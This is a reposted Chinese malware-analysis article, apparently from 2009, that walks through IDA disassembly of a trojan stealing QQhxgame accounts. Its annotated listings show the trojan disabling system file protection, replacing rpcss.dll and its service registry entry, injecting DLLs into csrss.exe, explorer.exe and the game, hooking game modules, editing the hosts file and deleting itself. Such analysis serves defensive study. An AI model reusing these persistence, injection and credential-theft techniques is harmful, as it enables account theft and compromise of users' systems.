分析某个游戏木马 -电脑资料

电脑资料时间：2019-01-01 我要投稿

【www.unjs.com - 电脑资料】

【文章作者】ZzAge

【文章目标】游戏木马

【相关工具】IDA

【作者 Q Q】85400516

【作者邮箱】zzage@163.com

【作者主页】http://hi.baidu.com/zzage

【文章日期】2009年01月10日

此木马会替换系统文件,修改注册表,替换服务.达到随系统启动,修改hosts文件,屏蔽大部分游戏网站,然后利用HOOK技术盗窃游戏账号的相关信息，

分析某个游戏木马

。

.Upack:004021DF lea eax, [ebp+FileName]

.Upack:004021E5 push eax ; Dest

.Upack:004021E6 call sub_402305 ; 取临时文件夹+ ~%06x.~~~文件名的路径

2：

.Upack:004021F9 lea eax, [ebp+FileName]

.Upack:004021FF push eax ; lpFileName

.Upack:00402200 push 65h ; __int16

.Upack:00402202 push offset nNumberOfBytesToWrite ; nNumberOfBytesToWrite

.Upack:00402207 push 0 ; hModule

.Upack:00402209 call sub_402348 ; 释放资源到以上取的路径

3：

.Upack:0040225F lea eax, [ebp+Dest]

.Upack:00402265 push eax ; Dest

.Upack:00402266 push (offset aR19029_exerund+0Ch) ; int

.Upack:0040226B call sub_402417 ; 取系统目录+rundll32.exe文件路径

4：

.Upack:0040227E lea eax, [ebp+NewFileName]

.Upack:00402284 push eax ; Dest

.Upack:00402285 push offset aR19029_exerund ; int

.Upack:0040228A call sub_402417 ; 取系统目录+r19029.exe文件路径

.Upack:0040228F add esp, 30h

5：

.Upack:00402299 lea eax, [ebp+NewFileName]

.Upack:0040229F push 1 ; bFailIfExists

.Upack:004022A1 push eax ; lpNewFileName

.Upack:004022A2 lea eax, [ebp+Dest]

.Upack:004022A8 push eax ; lpExistingFileName

.Upack:004022A9 call CopyFileA ; 把系统目录+rundll32.exe复制到系统目录+r19029.exe

.Upack:004022B6 lea eax, [ebp+Filename]

.Upack:004022BC push eax

.Upack:004022BD lea eax, [ebp+FileName]

.Upack:004022C3 push eax

.Upack:004022C4 lea eax, [ebp+NewFileName]

.Upack:004022CA push eax

.Upack:004022CB lea eax, [ebp+Source]

.Upack:004022D1 push eax ; LPCSTR

.Upack:004022D2 lea eax, [ebp+CommandLine]

.Upack:004022D8 push eax ; LPSTR

.Upack:004022D9 call wsprintfA ; 输出连接字符串‘C:\windows\system32\r19029.exe 释放的资源路径 ins 当前文件路径

.Upack:004022ED lea eax, [ebp+CommandLine]

.Upack:004022F3 push eax ; lpCommandLine

.Upack:004022F4 call sub_4023C3 ; 用r19029.exe带参数加载运行调用自身释放出来的文件的导出函数（INS）

----------------------------------------------------------------------------

下面分析的是EXE释放出来的dll文件

1：

.data:10013231 call sub_1001389A ; 提升当前进程的权限

.data:10013236 push offset String ; lpString

.data:1001323B mov ebx, offset String2 ; "expl~~@orer.exe"

.data:10013240 push offset SubStr ; "~~@"

.data:10013245 push ebx ; Source

.data:10013246 call sub_10013BDB ; 去掉expl~~@orer.exe中的~~@字符串

.data:1001324B mov esi, StrStrIA

.data:10013251 add esp, 0Ch

.data:10013254 mov edi, offset byte_10011508

.data:10013259 push offset aCsrss_exe ; "csrss.exe"

.data:1001325E push edi

.data:1001325F call esi ; StrStrIA

.data:10013261 test eax, eax

.data:10013263 jz short loc_10013273 ; 比较当前的父进程是否为csrss.exe，是则不跳

.data:1001326C call sub_1001335A ; 创建shcsrss.exeEvent的事件对象和创建csrss.exeMutex互斥体，查找系统目录下文件名为sh00*.dll-shff*.dll的文件

.data:10013271 jmp short loc_100132BE

2：

.data:10013273 push ebx

.data:10013274 push edi

.data:10013275 call esi ; StrStrIA

.data:10013277 test eax, eax

.data:10013279 jz short loc_100132A6 ; 比较当前的父进程是否为explorer.exe，是则不跳

.data:1001327B call sub_1001343B ; 查找系统目录下文件名为sh00*.dll-shff*.dll的文件

.data:10013280 call sub_100134B7 ; 创建一个互斥体

.data:1001328C call sub_100132C2

.data:10013298 push ds:hModule ; hLibModule

.data:1001329E call FreeLibrary

.data:100132A4 jmp short loc_100132BE

3：

.data:100132A6 push offset aSvchost_exe ; "svchost.exe"

.data:100132AB push edi

.data:100132AC call esi ; StrStrIA

.data:100132AE test eax, eax

.data:100132B0 jz short loc_100132BE ; 比较当前的父进程是否为svchost.exe，是则不跳

.data:100132B9 call sub_10013309 ; 提升当前进程的权限，替换服务，系统目录+sh19029.dll插入csrss.exe进程

4：

.data:10012FC3 lea eax, [ebp+Dest]

.data:10012FC9 push eax ; Dest

.data:10012FCA push offset aCsrss_dll ; "csrss.dll"

.data:10012FCF call sub_1001376E ; 取系统目录+csrss.dll的路径

.data:10012FD4 mov edi, CopyFileA

.data:10012FDA pop ecx

.data:10012FDB pop ecx

.data:10012FDC lea eax, [ebp+Dest]

.data:10012FE2 push 0 ; bFailIfExists

.data:10012FE4 mov ebx, offset Buffer

.data:10012FE9 push eax ; lpNewFileName

.data:10012FEA push ebx ; lpExistingFileName

.data:10012FEB call edi ; CopyFileA ; 把自身的复制为系统目录+csrss.dll

.data:10012FF4 lea eax, [ebp+pszPath]

.data:10012FFA push eax ; Dest

.data:10012FFB push offset aSpcss_dll ; "spcss.dll"

.data:10013000 call sub_1001376E ; 取系统目录+spcss.dll的路径

.data:10013005 lea eax, [ebp+hFile]

.data:1001300B push eax ; Dest

.data:1001300C push offset aRpcss_dll ; "rpcss.dll"

.data:10013011 call sub_1001376E ; 取系统目录+rpcss.dll的路径

.data:1001301D lea eax, [ebp+hFile]

.data:10013023 push eax ; lpMultiByteStr

.data:10013024 call sub_10012F44 ; 调用sfc_os.dll的函数，来关闭对系统文件的保护

.data:10013030 lea eax, [ebp+FileName]

.data:10013036 push eax ; Dest

.data:10013037 push offset a__Servicepackf ; "..\\ServicePackFiles\\i386\\rpcss.dll"

.data:1001303C call sub_1001376E ; 取系统目录+..\\ServicePackFiles\\i386\\rpcss.dll的路径

.data:10013041 mov esi, DeleteFileA

.data:10013047 add esp, 1Ch

.data:1001304A lea eax, [ebp+FileName]

.data:10013050 push eax ; lpFileName

.data:10013051 call esi ; DeleteFileA ; 删除系统目录+..\\ServicePackFiles\\i386\\rpcss.dll文件

.data:1001305A lea eax, [ebp+FileName]

.data:10013060 push eax ; Dest

.data:10013061 push offset aDllcacheRpcss_ ; "dllcache\\rpcss.dll"

.data:10013066 call sub_1001376E ; 取系统目录+dllcache\\rpcss.dll的路径

.data:1001306B pop ecx

.data:1001306C lea eax, [ebp+FileName]

.data:10013072 pop ecx

.data:10013073 push eax ; lpFileName

.data:10013074 call esi ; DeleteFileA ; 删除系统目录+dllcache\\rpcss.dll

.data:10013076 lea eax, [ebp+pszPath]

.data:1001307C push eax ; pszPath

.data:1001307D call PathFileExistsA ; 检测系统目录+spcss.dll路径是否有效

.data:1001307D ;

.data:10013083 test eax, eax

.data:10013085 jnz short loc_100130A4

.data:1001308E lea eax, [ebp+pszPath]

.data:10013094 push 1 ; dwFlags

.data:10013096 push eax ; lpNewFileName

.data:10013097 lea eax, [ebp+hFile]

.data:1001309D push eax ; lpExistingFileName

.data:1001309E call MoveFileExA ; 把系统目录+rpcss.dll文件移动为系统目录+spcss.dll

.data:1001309E ;

.data:100130A4

.data:100130A4 loc_100130A4: ; CODE XREF: sub_10012FB0+D5 j

.data:100130A4 lea eax, [ebp+hFile]

.data:100130AA push 0 ; bFailIfExists

.data:100130AC push eax ; lpNewFileName

.data:100130AD push ebx ; lpExistingFileName

.data:100130AE call edi ; CopyFileA ; 把自身复制到系统目录+rpcss.dll

.data:100130B0 lea eax, [ebp+pszPath]

.data:100130B6 push eax ; int

.data:100130B7 lea eax, [ebp+hFile]

.data:100130BD push eax ; hFile

.data:100130BE call sub_10013B15 ; 把系统目录+rpcss.dll的文件创建时间设置为系统目录+spcss.dll文件的创建时间

.data:100130CA lea eax, [ebp+FileName]

.data:100130D0 push eax ; Dest

.data:100130D1 push offset aSh19029_dll ; "sh19029.dll"

.data:100130D6 call sub_1001376E ; 取系统目录+sh19029.dll路径

.data:100130DB lea eax, [ebp+FileName]

.data:100130E1 push eax ; lpFileName

.data:100130E2 push 65h ; __int16

.data:100130E4 push offset nNumberOfBytesToWrite ; "BIN"

.data:100130E9 push ds:hModule ; hModule

.data:100130EF call sub_100135E1 ; 释放文件到系统目录+sh19029.dll

.data:100130FB lea eax, [ebp+pszPath]

.data:10013101 push eax ; int

.data:10013102 lea eax, [ebp+FileName]

.data:10013108 push eax ; hFile

.data:10013109 call sub_10013B15 ; 把系统目录+sh19029.dll的文件创建时间设置为系统目录+spcss.dll文件的创建时间

.data:1001310E add esp, 28h

.data:10013111 pop edi

.data:10013112 pop esi

.data:10013113 pop ebx

.data:10013114 leave

.data:10013115 retn

5：

.data:1001369B push [ebp+arg_0]

.data:1001369E lea eax, [ebp+SubKey]

.data:100136A4 push offset Format ; "SYSTEM\\CurrentControlSet\\Services\\%s"

.data:100136A9 push eax ; Dest

.data:100136AA call sprintf ; 取SYSTEM\CurrentControlSet\Services\rpcss注册表路径

.data:100136B0 add esp, 0Ch

.data:100136BA lea eax, [ebp+hKey]

.data:100136BD push eax ; phkResult

.data:100136BE push 0F003Fh ; samDesired

.data:100136C3 lea eax, [ebp+SubKey]

.data:100136C9 push 0 ; ulOptions

.data:100136CB push eax ; lpSubKey

.data:100136CC push [ebp+hKey] ; hKey

.data:100136CF call RegOpenKeyExA ; 打开SYSTEM\CurrentControlSet\Services\rpcss注册表

.data:100136DC test eax, eax

.data:100136DE jnz short loc_1001374C

.data:100136E7 mov esi, lstrlenA

.data:100136ED mov edi, offset Data ; "LocalSystem"

.data:100136F2 push edi ; lpString

.data:100136F3 call esi ; lstrlenA

.data:100136F5 inc eax

.data:100136F6 push eax ; cbData

.data:100136F7 push edi ; lpData

.data:100136F8 mov edi, RegSetValueExA

.data:100136FE push 2 ; dwType

.data:10013700 push 0 ; Reserved

.data:10013702 push offset ValueName ; "ObjectName"

.data:10013707 push [ebp+hKey] ; hKey

.data:1001370A call edi ; RegSetValueExA ; 设置ObjectName注册表项的值为LocalSystem

.data:1001370C test eax, eax

.data:1001370E jnz short loc_1001374C

.data:10013717 lea eax, [ebp+phkResult]

.data:1001371A push eax ; phkResult

.data:1001371B push offset SubKey ; "Parameters"

.data:10013720 push [ebp+hKey] ; hKey

.data:10013723 call RegOpenKeyA ; 打开Parameters注册表项

.data:10013729 test eax, eax

.data:1001372B jnz short loc_1001374C

.data:10013734 push [ebp+lpData] ; lpString

.data:10013737 call esi ; lstrlenA

.data:10013739 inc eax

.data:1001373A push eax ; cbData

.data:1001373B push [ebp+lpData] ; lpData

.data:1001373E push 2 ; dwType

.data:10013740 push 0 ; Reserved

.data:10013742 push offset aServicedll ; "ServiceDll"

.data:10013747 push [ebp+phkResult] ; hKey

.data:1001374A call edi ; RegSetValueExA ; 设置ServiceDll注册表项的值为自身的路径

6：

.data:1001333B push eax ; lpThreadId

.data:1001333C push eax ; dwCreationFlags

.data:1001333D push eax ; lpParameter

.data:1001333E push offset StartAddress ; lpStartAddress

.data:10013343 push eax ; dwStackSize

.data:10013344 push eax ; lpThreadAttributes

.data:10013345 call CreateThread ; 创建csrss.exemutex互斥体,并把系统目录+sh19029.dll插入csrss.exe进程

7：（INS导出函数）

.data:10013116 push ebp

.data:10013117 mov ebp, esp

.data:10013119 sub esp, 514h

.data:1001311F push esi

.data:10013120 push edi

.data:10013128 lea eax, [ebp+FileName]

.data:1001312E push eax ; Dest

.data:1001312F push offset aSh19029_ini ; "sh19029.ini"

.data:10013134 call sub_1001376E ; 取系统目录+sh19029.ini路径

.data:10013140 mov edi, 0B40h

.data:10013145 mov esi, offset a7??4Hieib3 ; "7??4^HIeib`^3>"

.data:1001314A push edi ; nNumberOfBytesToWrite

.data:1001314B lea eax, [ebp+FileName]

.data:10013151 push esi ; lpBuffer

.data:10013152 push eax ; lpFileName

.data:10013153 call sub_10013B94 ; 把木马指定收信地址的相关信息写入到sh19029.ini路径

.data:1001315F push edi ; nNumberOfBytesToWrite

.data:10013160 lea eax, [ebp+FileName]

.data:10013166 push esi ; lpBuffer

.data:10013167 push eax ; lpFileName

.data:10013168 call sub_10013B94 ; 同上

.data:1001316D add esp, 20h

.data:10013177 call sub_10012FB0 ; 替换系统文件rpcss.dll,并释放文件到系统目录+sh19029.dll

.data:1001317C xor eax, eax

.data:1001317E push offset Name ; "shcsrss.exeEvent"

.data:10013183 push eax ; bInitialState

.data:10013184 push eax ; bManualReset

.data:10013185 push eax ; lpEventAttributes

.data:10013186 call CreateEventA ; 创建事件

.data:1001318C mov esi, eax

.data:1001318E call GetLastError

.data:10013194 cmp eax, 0B7h

.data:10013199 jnz short loc_100131AB

.data:1001319B push esi ; hEvent

.data:1001319C call SetEvent

.data:100131A2 push esi ; hObject

.data:100131A3 call CloseHandle

.data:100131A9 jmp short loc_100131F5

.data:100131AB ; ---------------------------------------------------------------------------

.data:100131AB

.data:100131AB loc_100131AB: ; CODE XREF: ins+83 j

.data:100131B2 push esi ; hObject

.data:100131B3 call CloseHandle

.data:100131B9 push offset String ; lpString

.data:100131BE mov esi, offset String2 ; "expl~~@orer.exe"

.data:100131C3 push offset SubStr ; "~~@"

.data:100131C8 push esi ; Source

.data:100131C9 call sub_10013BDB

.data:100131CE lea eax, [ebp+dwProcessId]

.data:100131D4 push eax ; int

.data:100131D5 push esi ; lpString2

.data:100131D6 call sub_100137C2 ; 建立进程快照枚举explorer.exe进程

.data:100131E2 push offset Buffer ; lpBuffer

.data:100131E7 push [ebp+dwProcessId] ; dwProcessId

.data:100131ED call sub_10013919 ; 把释放出来的sh19029.dll文件插入到explorer.exe进程

.data:100131F2 add esp, 1Ch

.data:100131F5

.data:100131F5 loc_100131F5: ; CODE XREF: ins+93 j

.data:100131F5 push [ebp+lpFileName] ; pszPath

.data:100131F8 mov esi, PathFileExistsA

.data:100131FE

.data:100131FE loc_100131FE: ; CODE XREF: ins+109 j

.data:100131FE call esi ; PathFileExistsA

.data:10013200 test eax, eax

.data:10013202 jz short loc_10013221

.data:1001320B push [ebp+lpFileName] ; lpFileName

.data:1001320E call DeleteFileA ; 删除载体EXE文件

.data:10013214 push 14h ; dwMilliseconds

.data:10013216 call Sleep

.data:1001321C push [ebp+lpFileName]

.data:1001321F jmp short loc_100131FE

.data:10013221 ; ---------------------------------------------------------------------------

.data:10013221

.data:10013221 loc_10013221: ; CODE XREF: ins+EC j

.data:10013221 pop edi

.data:10013222 pop esi

.data:10013223 leave

.data:10013224 retn 10h

-----------------------------------------------------------------------

以下分析文件的记录为以上dll释放出来的dll文件

1：

.data:2000886D call sub_200075AC ; 提升当前进程的权限

.data:20008872 mov esi, offset aQqhxgame_exe ; "QQhxgame.exe"

.data:20008877 lea edi, [ebp+Source]

.data:2000887D movsd

.data:2000887E movsd

.data:2000887F movsd

.data:20008880 movsb

.data:20008881 push 3Dh

.data:20008883 xor eax, eax

.data:20008885 pop ecx

.data:20008886 lea edi, [ebp+var_FB]

.data:2000888C rep stosd

.data:2000888E stosw

.data:20008890 mov esi, offset Default

.data:20008895 mov ebx, offset SubStr ; "~~@"

.data:2000889A stosb

.data:2000889B push esi ; lpString

.data:2000889C lea eax, [ebp+Source]

.data:200088A2 push ebx ; SubStr

.data:200088A3 push eax ; Source

.data:200088A4 call sub_20007D57

.data:200088B0 lea eax, [ebp+FileName]

.data:200088B6 push eax ; Dest

.data:200088B7 push offset aSh19029_ini ; "sh19029.ini"

.data:200088BC call sub_20007480 ; 取系统目录+sh19029.ini的路径

.data:200088C1 push 0B40h ; nNumberOfBytesToRead

.data:200088C6 lea eax, [ebp+FileName]

.data:200088CC push offset String2 ; lpBuffer

.data:200088D1 push eax ; lpFileName

.data:200088D2 call sub_20007B6A ; 读取系统目录+sh19029.ini文件的内容到缓冲区

.data:200088DE push esi ; lpString

.data:200088DF push ebx ; SubStr

.data:200088E0 push offset aExpl@orer_exe ; "expl~~@orer.exe"

.data:200088E5 call sub_20007D57 ; 删除expl~~@orer.ex中的~~@字符串

.data:200088EA add esp, 2Ch

.data:200088F4 mov esi, StrStrIA

.data:200088FA mov edi, offset byte_2000485C

.data:200088FF push offset aCsrss_exe ; "csrss.exe"

.data:20008904 push edi

.data:20008905 call esi ; StrStrIA

.data:20008907 test eax, eax

.data:20008909 jnz short loc_2000894D ; 判断当前父进程是否为csrss.exe,是就跳

.data:2000890B push offset aExpl@orer_exe ; "expl~~@orer.exe"

.data:20008910 push edi

.data:20008911 call esi ; StrStrIA

.data:20008913 test eax, eax

.data:20008915 jnz short loc_2000894D ; 判断当前父进程是否为explorer.exe,是就跳

.data:20008917 lea eax, [ebp+Source]

.data:2000891D push eax

.data:2000891E push edi

.data:2000891F call esi ; StrStrIA

.data:20008921 test eax, eax

.data:20008923 jz short loc_20008939 ; 判断当前父进程是否为QQhxgame.exe.是则不跳

.data:2000892C mov ecx, [ebp+var_4]

.data:2000892F call sub_20008B74 ; 创建互斥体,查找qqhxgame.exe进程里面模块tradeclient.dll和controller.dll，对其进行Hook.修改hosts文件,进行域名欺骗或阻止访问一些游戏网站,然后在把得到的相关账号数据,发送到指定的收信地址

.data:20008934 jmp loc_200089F0

.data:20008939 ; ---------------------------------------------------------------------------

.data:20008939

.data:20008939 loc_20008939: ; CODE XREF: sub_20008857+CC j

.data:20008940 mov ecx, [ebp+var_4]

.data:20008943 mov eax, [ecx]

.data:20008945 call dword ptr [eax+10h] ; 创建互斥体,修改hosts文件,进行域名欺骗或阻止访问一些游戏网站,查找QQhxgame.exe进程里模块名为QQLogin.exe，然后在QQLogin.exe查找tenhx.dll模块，对进行tenhx.dll模块进行Hook,把得到的相关账号数据发送到指定的收信地址

.data:20008948 jmp loc_200089F0

.data:2000894D ; ---------------------------------------------------------------------------

.data:2000894D

.data:2000894D loc_2000894D: ; CODE XREF: sub_20008857+B2 j

.data:2000894D ; sub_20008857+BE j

.data:20008954 mov ecx, [ebp+var_4]

.data:20008957 call sub_20008A44 ; 创建互斥体,建立进程快照查找QQhxgame.exe进程,再查找系统目录下的sh19029.dll文件，然后把sh19029.dll文件插进QQhxgame.exe进程

.data:20008963 lea eax, [ebp+Dest]

.data:20008969 push eax ; lpBuffer

.data:2000896A push 104h ; nBufferLength

.data:2000896F call GetTempPathA ; 取临时文件夹路径

.data:20008975 lea eax, [ebp+Dest]

.data:2000897B push offset a_ ; "*.~~~"

.data:20008980 push eax ; Dest

.data:20008981 call strcat

.data:20008986 push 6

.data:20008988 mov esi, offset aC@md@C@de@lS ; "c~~@md ~~@/c ~~@de~~@l %s"

.data:2000898D pop ecx

.data:2000898E lea edi, [ebp+Format]

.data:20008994 rep movsd

.data:20008996 movsw

.data:20008998 push 3Ah

.data:2000899A xor eax, eax

.data:2000899C pop ecx

.data:2000899D lea edi, [ebp+var_2F6]

.data:200089A3 rep stosd

.data:200089A5 stosw

.data:200089A7 push offset Default ; lpString

.data:200089AC lea eax, [ebp+Format]

.data:200089B2 push ebx ; SubStr

.data:200089B3 push eax ; Source

.data:200089B4 call sub_20007D57

.data:200089B9 add esp, 14h

.data:200089BC lea eax, [ebp+Dest]

.data:200089C2 push eax

.data:200089C3 lea eax, [ebp+Format]

.data:200089C9 push eax ; Format

.data:200089CA lea eax, [ebp+CmdLine]

.data:200089D0 push eax ; Dest

.data:200089D1 call sprintf

.data:200089D7 add esp, 0Ch

.data:200089E1 lea eax, [ebp+CmdLine]

.data:200089E7 push 0 ; uCmdShow

.data:200089E9 push eax ; lpCmdLine

.data:200089EA call WinExec ; 运行cmd /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\*.~~~删除*.~~~文件命令

相关文章